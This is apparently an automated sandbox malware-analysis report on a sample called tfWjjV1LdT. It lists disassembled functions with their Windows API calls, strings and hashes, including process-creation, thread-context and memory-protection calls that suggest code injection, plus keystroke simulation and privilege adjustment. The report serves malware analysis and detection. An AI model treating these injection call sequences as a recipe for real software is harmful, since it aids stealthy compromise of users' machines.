Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 1bc02314dfd0bc05ed0da270a04e2a142903909eb74ba276bc7ef7902fa397fd
Instruction ID: 389a3827113ec2a46d6c23bcbde05bf27edc302ad247b95839d95e828d20351c
Opcode Fuzzy Hash: 1bc02314dfd0bc05ed0da270a04e2a142903909eb74ba276bc7ef7902fa397fd
Instruction Fuzzy Hash: 19F0BBF1800A049EDB607F7598017ED7BE66F41374F24810DA425AB2C1EFFC89C29B59

Function 00D51EBD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D5267B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D52711
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D52733

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: ccd43f634bf60ef7f3491c936c654885699c19dfddd26be9fcff22ff5d79e149
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 1412FE24E24658C6EB24DF60D8507DEB232EF68300F1090E9950DEB7A5E77A4F85CF5A

Function 006B0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 006B0CB7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 84471bfe0e58c35ea8e83713446e39cfa22c970e191f7f9979120427cd905cf4
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B131B5B4A001059FE718DF58C4859AAFFA6FB59300B6497A5E80ACB355DB31EDC1DBC0

Function 006CFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006CFCB7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0d9ae4f64fd9f4dec7c4aa11c48f8e1fe013ce3a3653a1f85055acf1f3376f55
Instruction ID: 4d29b6d05c949edaf1850a8f3f833481199f9f46fc24fc0a9842bf0d7997d699
Opcode Fuzzy Hash: 0d9ae4f64fd9f4dec7c4aa11c48f8e1fe013ce3a3653a1f85055acf1f3376f55
Instruction Fuzzy Hash: EF4106B4504341DFDB24DF18C444B5ABBE6BF45318F0988ACE89A8B762C735E845CF96

Function 0069784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00697899

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
Instruction ID: 054a5be6c324ea0b7da593ff42d98c78196b0968b8127d35b80e524bc832a923
Opcode Fuzzy Hash: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
Instruction Fuzzy Hash: 5511A531618205AFDB14DF28C585C7EB7AEEF85324724412EE915CB791DB32EC12C794

Function 00694DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00694BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00694BEF

Part of subcall function 006B525B: __wfsopen.LIBCMT ref: 006B5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694E0F

Part of subcall function 00694B6A: FreeLibrary.KERNEL32(00000000), ref: 00694BA4

Part of subcall function 00694C70: _memmove.LIBCMT ref: 00694CBA

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: c312956e5ae229149ed2d0c5bead3d5220ddd4d8cc21774a11a3981542a9d934
Instruction ID: 2c7730a05eefea09d94a8b7e8d27aabe3134c31c884c91e807fd5d94a3952c08
Opcode Fuzzy Hash: c312956e5ae229149ed2d0c5bead3d5220ddd4d8cc21774a11a3981542a9d934
Instruction Fuzzy Hash: 5A11E331600205ABCF14EF74CC52FAD77AEAF44750F10882DF642A7581DE759A029B58

Function 006CFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 006CFD91

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 27b92d2c62374d4c1536b8fda2b5da3750d4c5eb729e3573f64bbb0a5f562993
Instruction ID: c03b565496fbd237b64c15ab7a1cbe7be8ad7b878832b698fb83002163f6943c
Opcode Fuzzy Hash: 27b92d2c62374d4c1536b8fda2b5da3750d4c5eb729e3573f64bbb0a5f562993
Instruction Fuzzy Hash: 0C2157B4908301DFDB14DF64C444B5ABBE6BF88314F05896CF88A47B22D731E809CB96

Function 006B4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 006B48A6

Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 1d4469a826abde98d7a5bbf0436d6c1bca6356a4372defea431a35ff09aecd46
Instruction ID: 6286abb9428ee9cd47216303801f814cafecaa79a14012f89d15020f2bd2f4d2
Opcode Fuzzy Hash: 1d4469a826abde98d7a5bbf0436d6c1bca6356a4372defea431a35ff09aecd46
Instruction Fuzzy Hash: 52F08CB1900609ABDF91AFA488067EE36A7AF00325F158418B4249B292CF79C9D1DB55

Function 00694E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694E7E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a8cb02fb2ff99052b6a92c93d1e78e8bcafe59890637d93a17f04948cc6ceaf3
Instruction ID: daff14e69210bc5b888bd6a84953c04967368eddd01eb4d80d60e69bfefdac4c
Opcode Fuzzy Hash: a8cb02fb2ff99052b6a92c93d1e78e8bcafe59890637d93a17f04948cc6ceaf3
Instruction Fuzzy Hash: C9F01C71505711CFCF349F64D494C96B7EABF143293108A3EE2D682A11CB319882DB40

Function 006B0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B07B0

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 706f628aa4925dc7c58257024e25d461e469a112a3bb6e987b280f98a71903fb
Instruction ID: fede99259454a54e8992dcdb94d85659d07bf7f327a6bf2a96de9958975c896f
Opcode Fuzzy Hash: 706f628aa4925dc7c58257024e25d461e469a112a3bb6e987b280f98a71903fb
Instruction Fuzzy Hash: 96E0863690422857CB20965C9C05FEA779DDB896A1F0441B9FC08D7249D9749C808694

Function 006B525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 006B5266

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: a9d2a39ab5669621a6a2b00928ab17f66a74706e8abb958256a6676894ee2dee
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 6EB092B644020C77CE022A82EC02B893B1A9B41764F408020FB0C18162A673AAA49A89

Function 00D52EC0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00D52ED1

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2f2d3a2ae5317c148a727b7deb2df07ee0d088cb4cb3559556bfc443bda23baa
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 66E0E67594010DDFDB00EFB8D9496AE7FF4EF04302F100161FD01E2280D6309D548A72

Non-executed Functions

Function 0071CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0071CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CB95
GetWindowLongW.USER32(?,000000F0), ref: 0071CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071CC00
SendMessageW.USER32 ref: 0071CC29
_wcsncpy.LIBCMT ref: 0071CC95
GetKeyState.USER32(00000011), ref: 0071CCB6
GetKeyState.USER32(00000009), ref: 0071CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CCD9
GetKeyState.USER32(00000010), ref: 0071CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071CD0C
SendMessageW.USER32 ref: 0071CD33
SendMessageW.USER32(?,00001030,?,0071B348), ref: 0071CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0071CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0071CE60
SetCapture.USER32(?), ref: 0071CE69
ClientToScreen.USER32(?,?), ref: 0071CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0071CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0071CEF5
ReleaseCapture.USER32 ref: 0071CF00
GetCursorPos.USER32(?), ref: 0071CF3A
ScreenToClient.USER32(?,?), ref: 0071CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0071CFA3
SendMessageW.USER32 ref: 0071CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D00E
SendMessageW.USER32 ref: 0071D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0071D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0071D06D
GetCursorPos.USER32(?), ref: 0071D08D
ScreenToClient.USER32(?,?), ref: 0071D09A
GetParent.USER32(?), ref: 0071D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0071D123
SendMessageW.USER32 ref: 0071D154
ClientToScreen.USER32(?,?), ref: 0071D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0071D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D20C
SendMessageW.USER32 ref: 0071D22F
ClientToScreen.USER32(?,?), ref: 0071D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0071D2B5

Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC

GetWindowLongW.USER32(?,000000F0), ref: 0071D351

Strings

pbu, xrefs: 0071CEAF
F, xrefs: 0071D235
@GUI_DRAGID, xrefs: 0071CE9C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbu
API String ID: 3977979337-570719866
Opcode ID: d8263cd1824fe6a907e980f31057dbab799c39da0b20a2ed84037a20a0c98a09
Instruction ID: ccf3b5ee587db2931619d9c7dcde35cc488771438e3d2e4ba75be0d855a440f1
Opcode Fuzzy Hash: d8263cd1824fe6a907e980f31057dbab799c39da0b20a2ed84037a20a0c98a09
Instruction Fuzzy Hash: D142AB74208381AFDB22CF68C845AEABBE5FF48310F144929F555C72E0C779E894DB96

Function 006A6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006A71C3
_memset.LIBCMT ref: 006A7539
_memmove.LIBCMT ref: 006A76AC

Strings

3cj, xrefs: 006E23A0
P\t, xrefs: 006E1AB8
[:>:]], xrefs: 006A7492
Q\E, xrefs: 006A7FCB
DEFINE, xrefs: 006E2103
\b(?=\w), xrefs: 006E3769
[:<:]], xrefs: 006A7479
_j, xrefs: 006E23CB
\b(?<=\w), xrefs: 006E3773
]t, xrefs: 006E1A22

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]t$3cj$DEFINE$P\t$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_j
API String ID: 1357608183-1184944521
Opcode ID: 79d3775b63f94249b06fb2d3ba21367a916275ddc27a77032064103aaa19006b
Instruction ID: f9d5cf575807fe259e6a7e8702e641172addec92aaf6a8883887e6550d2b1609
Opcode Fuzzy Hash: 79d3775b63f94249b06fb2d3ba21367a916275ddc27a77032064103aaa19006b
Instruction Fuzzy Hash: 0A93A171A01356DBDB24DF59C891BEDB7B2FF49310F24816AE945AB381E7709E82CB40

Function 006948D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 006948DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006CD665
IsIconic.USER32(?), ref: 006CD66E
ShowWindow.USER32(?,00000009), ref: 006CD67B
SetForegroundWindow.USER32(?), ref: 006CD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006CD69B
GetCurrentThreadId.KERNEL32 ref: 006CD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 006CD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 006CD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 006CD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 006CD6CF
SetForegroundWindow.USER32(?), ref: 006CD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD6E7
keybd_event.USER32(00000012,00000000), ref: 006CD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD6FC
keybd_event.USER32(00000012,00000000), ref: 006CD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD70A
keybd_event.USER32(00000012,00000000), ref: 006CD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD719
keybd_event.USER32(00000012,00000000), ref: 006CD71E
SetForegroundWindow.USER32(?), ref: 006CD721
AttachThreadInput.USER32(?,?,00000000), ref: 006CD748

Strings

Shell_TrayWnd, xrefs: 006CD660

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 24a72c43faadc8a2b3860351b2f6387639e8a8c63017c0eb0c5bb0f40c03a34c
Instruction ID: 9a0ae283a7a40b4c7b7e989b073106d9545e76b8c59e4d74ba5e8ba746576cfe
Opcode Fuzzy Hash: 24a72c43faadc8a2b3860351b2f6387639e8a8c63017c0eb0c5bb0f40c03a34c
Instruction Fuzzy Hash: D031A571A40318BBEB206F658C49FBF7F6DEB44B50F108039FA04EA1D1C6B49C11ABA5

Function 006E8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E882B
Part of subcall function 006E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8858
Part of subcall function 006E87E1: GetLastError.KERNEL32 ref: 006E8865

_memset.LIBCMT ref: 006E8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006E83A5
CloseHandle.KERNEL32(?), ref: 006E83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E83CD
GetProcessWindowStation.USER32 ref: 006E83E6
SetProcessWindowStation.USER32(00000000), ref: 006E83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E840A

Part of subcall function 006E81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8309), ref: 006E81E0
Part of subcall function 006E81CB: CloseHandle.KERNEL32(?,?,006E8309), ref: 006E81F2

Strings

winsta0, xrefs: 006E83C8
, xrefs: 006E8362
default, xrefs: 006E8405

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 900eec6aa2a6e3235d56bee7473fe70d853b72b9c184bbdbbc66c0aa7a62d210
Instruction ID: 453b257dfce10ada3f33a4966cd9473a9bdb2e450be80059ba96efb76e28586e
Opcode Fuzzy Hash: 900eec6aa2a6e3235d56bee7473fe70d853b72b9c184bbdbbc66c0aa7a62d210
Instruction Fuzzy Hash: DB81ADB1801389AFDF51DFA5CC45AEE7BBAEF04304F148129F819A32A1DB358E15DB24

Function 006FC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006FC78D
FindClose.KERNEL32(00000000), ref: 006FC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 006FC844
__swprintf.LIBCMT ref: 006FC890
__swprintf.LIBCMT ref: 006FC8D3

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

__swprintf.LIBCMT ref: 006FC927

Part of subcall function 006B3698: __woutput_l.LIBCMT ref: 006B36F1

__swprintf.LIBCMT ref: 006FC975

Part of subcall function 006B3698: __flsbuf.LIBCMT ref: 006B3713
Part of subcall function 006B3698: __flsbuf.LIBCMT ref: 006B372B

__swprintf.LIBCMT ref: 006FC9C4
__swprintf.LIBCMT ref: 006FCA13
__swprintf.LIBCMT ref: 006FCA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 006FC88A
%4d, xrefs: 006FC8CD
%02d, xrefs: 006FC91B, 006FC925, 006FC973, 006FC9C2, 006FCA11, 006FCA60

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 2199967995a199ed6971ea8290230116a1c4c0eb528d98e64b3268833e0c96a6
